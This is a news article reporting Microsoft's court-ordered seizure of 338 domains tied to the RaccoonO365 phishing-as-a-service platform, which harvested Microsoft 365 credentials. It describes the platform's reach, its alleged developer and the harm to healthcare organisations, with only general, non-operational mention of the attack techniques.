Microsoft Shuts Down Over 300 Websites Spreading RaccoonO365 Phishing Operation
In a significant move, Microsoft's Digital Crimes Unit (DCU) recently secured a court order from the Southern District of New York to seize 338 domains facilitating the distribution of the RaccoonO365 phishing platform. This subscription-based service, which has been active since mid-2024, has been used to harvest Microsoft 365 credentials at scale, affecting over 5,000 accounts across 94 countries as of September 2025.
RaccoonO365 replicates Microsoft branding, email templates, and login portals to trick recipients into divulging usernames, passwords, and multi-factor authentication (MFA) codes. The infection mechanism involves dynamic form injection and transparent redirection tactics, with a small JavaScript snippet capturing input fields and forwarding credentials to the attacker's server.
Advanced operators employ session-token reuse and header manipulation to bypass MFA prompts in RaccoonO365's infection mechanism. Not all stolen credentials resulted in direct network intrusions, but the impact on high-value sectors, particularly healthcare, was severe. At least 20 U.S. healthcare organizations reported delayed patient care, compromised lab results, and data breaches following successful RaccoonO365 phishing attempts.
Microsoft analysts have identified Joshua Ogundipe, a Nigerian developer, as the primary author of the RaccoonO365 phishing-as-a-service platform. Ogundipe operates a Telegram channel with over 850 members, advertising both standard phishing kits and a newly introduced 'AI-MailCheck' service designed to refine spear-phishing efficacy. Investigators traced over $100,000 in subscription payments to Ogundipe through an operational security lapse revealing a cryptocurrency wallet.
The seized domains served as both phishing hosts and command-and-control interfaces for subscription management, crippling the ability of subscribers to launch fresh attacks. Microsoft's partnership with Health-ISAC underlined the public safety implications, as stolen credentials often served as initial access points for subsequent malware or ransomware deployments.
RaccoonO365's rapid evolution underscores the critical importance of layered defenses and user awareness. The platform now includes features that subvert MFA protections and automate credential harvesting at rates up to 9,000 targets per day. As the digital landscape continues to evolve, it is essential for individuals and organizations to remain vigilant against such threats.
Read also:
- Global Content Dissemination Through Cross-Linguistic Voiceovers
- Mandated automobile safety technologies in the EU may be deemed "irrational," "erratic," and potentially dangerous, experts caution.
- AI-Generated Humor Spreads on Gemini Nano Banana: Light-hearted Modifications Spark Concerns over User Privacy
- New study reveals that Language Models can execute complex assaults independent of human intervention
